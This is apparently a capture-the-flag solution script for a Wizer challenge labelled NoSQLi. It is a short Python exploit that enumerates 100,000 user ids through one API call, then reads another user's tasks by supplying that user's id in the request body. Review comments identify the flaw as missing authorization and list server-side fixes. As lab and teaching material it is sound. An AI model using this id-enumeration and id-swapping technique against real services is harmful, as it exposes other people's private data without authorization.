Wizer - Challenge 11 - NoSQLi

Exploit

import requests

url = "https://chal11.vercel.app/api"

# Challenge brief: logged in as Dave Cohen (user-id:10024), the goal is to
# read Jeff Gonzales's tasks.
#
# Neither request below sets a header, cookie or token, so the only identity
# the API receives is the id placed in the JSON body.
# NOTE(review): no query operator appears in either body; the weakness
# exercised here looks like missing authorization on caller-supplied ids
# rather than operator injection -- confirm against the API handler.

# Request 1: look up every id from 0 to 99,999 in one call to /users.
# Server-side fix: cap the array length, check element types, and return only
# records the authenticated caller is entitled to see. A single body holding
# 100,000 ids is also a clear anomaly to alert on.
candidate_ids = list(range(100_000))
users_response = requests.post(f"{url}/users", json={"user_ids": candidate_ids})
print(users_response.text)

# Request 2: fetch the tasks stored under id 10028 (sent as a string).
# NOTE(review): presumably 10028 is Jeff Gonzales's id read from the first
# response -- the page does not show that output.
# Server-side fix: derive the user id from the authenticated session instead
# of trusting "user_id" from the request body.
tasks_response = requests.post(f"{url}/tasks", json={"user_id": "10028"})
print(tasks_response.text)